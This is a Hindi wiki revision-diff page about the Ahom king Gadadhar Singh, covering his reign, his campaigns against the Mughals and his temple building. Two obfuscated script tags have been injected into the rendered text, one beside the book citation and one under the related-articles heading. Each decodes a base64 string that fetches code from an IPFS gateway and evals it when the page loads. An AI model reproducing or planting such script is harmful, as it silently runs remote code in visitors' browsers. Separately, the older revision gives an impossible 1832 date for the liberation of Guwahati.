Difference between revisions of "गदाधर सिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*गदाधर सिंह उन्नीसवाँ अहोम राजा था, जिसने आसाम पर ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "मज़बूर" to "मजबूर")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*गदाधर सिंह उन्नीसवाँ [[अहोम]] राजा था, जिसने [[आसाम]] पर पन्द्रह वर्षों (1681-96 ई.) तक राज्य किया।  
+
'''गदाधर सिंह''' [[असम]] के [[अहोम]] वंश का 19वाँ राजा था, जिसने असम पर 15 वर्षों (1681-1696 ई.) तक राज्य किया। गदाधर सिंह ने ही सबसे पहले [[गौहाटी]] को [[मुग़ल]] आधिपत्य से मुक्त कराया और [[औरंगज़ेब]] को मोनास नदी अहोम राज्य की सीमा मानने के लिए मजबूर कर दिया। मोनास नदी आधुनिक गोलपाड़ा और [[कामरूप ज़िला|कामरूप]] ज़िलों के बीच बहती है। गदाधर सिंह मुख्य रूप से शक्ति का उपासक था।
*गदाधर सिंह ने सबसे पहले 1832 ई. में [[गुवाहाटी|गौहाटी]] को [[मुग़ल]] आधिपत्य से मुक्त कराया और [[औरंगज़ेब]] को मोनास नदी अहोम राज्य की सीमा मानने के लिए मजबूर किया।
+
;शक्ति सम्पन्न
*मोनास नदी आधुनिक गोलपाड़ा और कामरूप ज़िलों के बीच बहती है।  
+
गदाधर सिंह बहुत ही शक्तिशाली शासक था। उसने सभी आन्तरिक षड़यंत्रों और उपद्रवों का दमन किया और असम में राज्य की गिरी हुई प्रतिष्ठा को फिर से ऊँचा उठाया। मीरा और नागा विद्रोहियों के विद्रोह को कुचला और सामन्तों की शक्ति को तोड़ा। गदाधर सिंह [[शाक्त]] (शक्ति का उपासक) था, इसलिए उसने [[वैष्णव|वैष्णवों]] का उत्पीड़न किया और वैष्णव गोसाइयों को कुचल डाला। उसने गौहाटी में कचेरी घाट के बिल्कुल सामने [[ब्रह्मपुत्र]] के एक द्वीप में उमानंदा मन्दिर का निर्माण कराया। [[ब्राह्मण|ब्राह्मणों]] और [[हिन्दू]] मन्दिरों को भूमिदान किया, कई राजमार्गों का निर्माण कराया, पत्थर के दो पुल बनवाये, तालाब खुदवाए और आसाम में जोतों का विस्तृत सर्वेक्षण आरम्भ कराया।
*गदाधर सिंह बहुत ही शक्तिशाली शासक था।  
+
;निधन
*गदाधर सिंह ने सभी आन्तरिक षड़यंत्रों और उपद्रवों का दमन किया, आसाम में राज्य की गिरी हुई प्रतिष्ठा को ऊँचा उठाया, मीरा और नागा विद्रोहियों को कुचला और सामन्तों की शक्ति को तोड़ा।  
+
गदाधर सिंह का निधन 1696 ई. में हो गया।
*गदाधर सिंह शाक्त (शक्ति का उपासक) था, इसलिए उसने [[वैष्णव|वैष्णवों]] का उत्पीड़न किया और वैष्णव गोसाइयों को कुचल डाला।  
 
*उसने गौहाटी में कचेरी घाट के बिल्कुल सामने ब्रह्मपुत्र के एक द्वीप में उमानंदा मन्दिर का निर्माण कराया।  
 
*[[ब्राह्मण|ब्राह्मणों]] और हिन्दू मन्दिरों को भूमिदान किया, कई राजमार्गों का निर्माण कराया, पत्थर के दो पुल बनवाये, तालाब खुदवाए और आसाम में जोतों का विस्तृत सर्वेक्षण आरम्भ कराया।<ref>(पुस्तक 'भारतीय इतिहास कोश') पृष्ठ संख्या-118</ref>
 
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=221|url=}}
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
[[Category:औपनिवेशिक काल]]
+
{{मध्य काल}}
 +
[[Category:मध्य काल]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 14:21, 29 January 2013

gadadhar sianh asam ke ahom vansh ka 19vaan raja tha, jisane asam par 15 varshoan (1681-1696 ee.) tak rajy kiya. gadadhar sianh ne hi sabase pahale gauhati ko mugal adhipaty se mukt karaya aur aurangazeb ko monas nadi ahom rajy ki sima manane ke lie majaboor kar diya. monas nadi adhunik golapa da aur kamaroop ziloan ke bich bahati hai. gadadhar sianh mukhy roop se shakti ka upasak tha.

shakti sampann

gadadhar sianh bahut hi shaktishali shasak tha. usane sabhi antarik sh dayantroan aur upadravoan ka daman kiya aur asam mean rajy ki giri huee pratishtha ko phir se ooancha uthaya. mira aur naga vidrohiyoan ke vidroh ko kuchala aur samantoan ki shakti ko to da. gadadhar sianh shakt (shakti ka upasak) tha, isalie usane vaishnavoan ka utpi dan kiya aur vaishnav gosaiyoan ko kuchal dala. usane gauhati mean kacheri ghat ke bilkul samane brahmaputr ke ek dvip mean umananda mandir ka nirman karaya. brahmanoan aur hindoo mandiroan ko bhoomidan kiya, kee rajamargoan ka nirman karaya, patthar ke do pul banavaye, talab khudavae aur asam mean jotoan ka vistrit sarvekshan arambh karaya.

nidhan

gadadhar sianh ka nidhan 1696 ee. mean ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 221 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>